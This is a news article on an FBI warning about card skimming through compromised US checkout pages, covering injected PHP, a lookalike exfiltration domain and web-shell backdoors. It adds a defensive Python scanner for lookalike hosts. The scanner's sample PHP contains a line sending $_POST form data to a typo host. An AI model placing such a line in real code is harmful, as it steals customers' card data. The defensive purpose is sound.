Online checkout pages for US businesses

Online checkout pages for US businesses are being hacked by threat actors who want to steal credit card data

In order to steal credit card information from unsuspecting customers, a threat actor has successfully compromised and altered a US business’ checkout page. Learn more about this threat.

The FBI has released a new FLASH report warning about cyber-criminals stealing credit card data from US businesses’ compromised checkout pages.

All it takes is a compromise

According to the FBI, a threat actor injected malicious PHP code into the company's checkout page.

That code scraped customer data from the shopping cart and exfiltrated it. Unwittingly, every user who purchased something from the compromised website sent their credit card information to the fraudsters.

The code sent the data to the fraudsters by opening a connection to a spoofed card processing site, whose domain name looks very similar to that of a legitimate card processing business.

TechRepublic found that the domain was fraudulently registered in December 2016 and that wary Internet users have reported it as being used fraudulently since at least November 2018.
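
One way to hunt for the exfiltration channel described above is to list every host the site's PHP code connects to and flag any that is close to, but not on, an allow-list of expected hosts. This is an added example, not code from the FBI report or the original article; the host names, the allow-list and the distance threshold are constructed assumptions.

```python
import re
from pathlib import Path

# Assumption: the only hosts this shop's PHP code should contact (constructed names).
ALLOWED_HOSTS = {"secure.cardprocessor.example", "www.shop.example"}
# Host after a URL/stream scheme, or as the first argument of a socket/cURL call.
HOST_RE = re.compile(
    r"""(?:(?:https?|ssl|tls|tcp)://|\b(?:p?fsockopen|curl_init)\s*\(\s*["'])"""
    r"""((?:[a-z0-9-]+\.)+[a-z]{2,})""", re.I)

def edit_distance(a, b):
    """Levenshtein distance, computed one row at a time."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def scan_source(name, text, max_distance=2):
    """Return (file, line, host, verdict, nearest) for each host not on the allow-list."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for host in (h.lower() for h in HOST_RE.findall(line)):
            if host in ALLOWED_HOSTS:
                continue
            nearest = min(ALLOWED_HOSTS, key=lambda ok: edit_distance(host, ok))
            close = edit_distance(host, nearest) <= max_distance
            findings.append((name, lineno, host, "lookalike" if close else "unknown", nearest))
    return findings

def scan_tree(root):
    """Scan every .php file under a web root."""
    return [f for p in sorted(Path(root).rglob("*.php"))
            for f in scan_source(str(p), p.read_text(errors="replace"))]

# Constructed sample: a checkout script with one expected and two unexpected hosts.
SAMPLE = """<?php
$ch = curl_init('https://secure.cardprocessor.example/v1/charge');
$fp = fsockopen('ssl://secure.cardprocesor.example', 443);
fwrite($fp, http_build_query($_POST));
$img = 'https://cdn.analytics.example/p.gif';
"""

if __name__ == "__main__":
    for finding in scan_source("checkout.php", SAMPLE):
        print(finding)
```

Hosts assembled at run time or hidden in encoded strings will not match this pattern, so treat an empty result as inconclusive.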

More backdoors and other tools

Two different backdoors were installed by the threat actor on the compromised website.

The first backdoor was created by inserting one line of code into the website's login process. According to the FBI, the system would execute and download a fully functional PAS web shell onto the company's web server. The PAS web shell, also known as Fobushell, was created in 2016 by Profexer, a Ukrainian developer, and a modified version can be found online. It consists of thousands of lines of PHP code and gives attackers a user-friendly interface.

The threat actor used another web shell, B374K, as a backdoor. This web shell is easy to find online, so cybercriminals have little difficulty obtaining and using it.

The attacker also used Adminer, a PHP-based tool for database management. This tool can be used for managing MySQL database content.

Credit card skimming has become a popular trend

This type of cybercrime is becoming more popular. Magecart is an example of a group that has been active since 2016 and targets thousands of websites to steal credit card data.

The availability of skimming equipment at relatively low prices has also contributed to an increase in skimming activity. Recent research has shown that the CaramelCorp skimming subscription cost $2,000 USD. This makes it easy for low-tech cybercriminals to get into the game and begin collecting credit card numbers to steal money.

How to defend yourself from threats

As always, it is a good idea to patch all operating systems and any software or code running on your website. This will significantly reduce the chance of your website being compromised by a known vulnerability.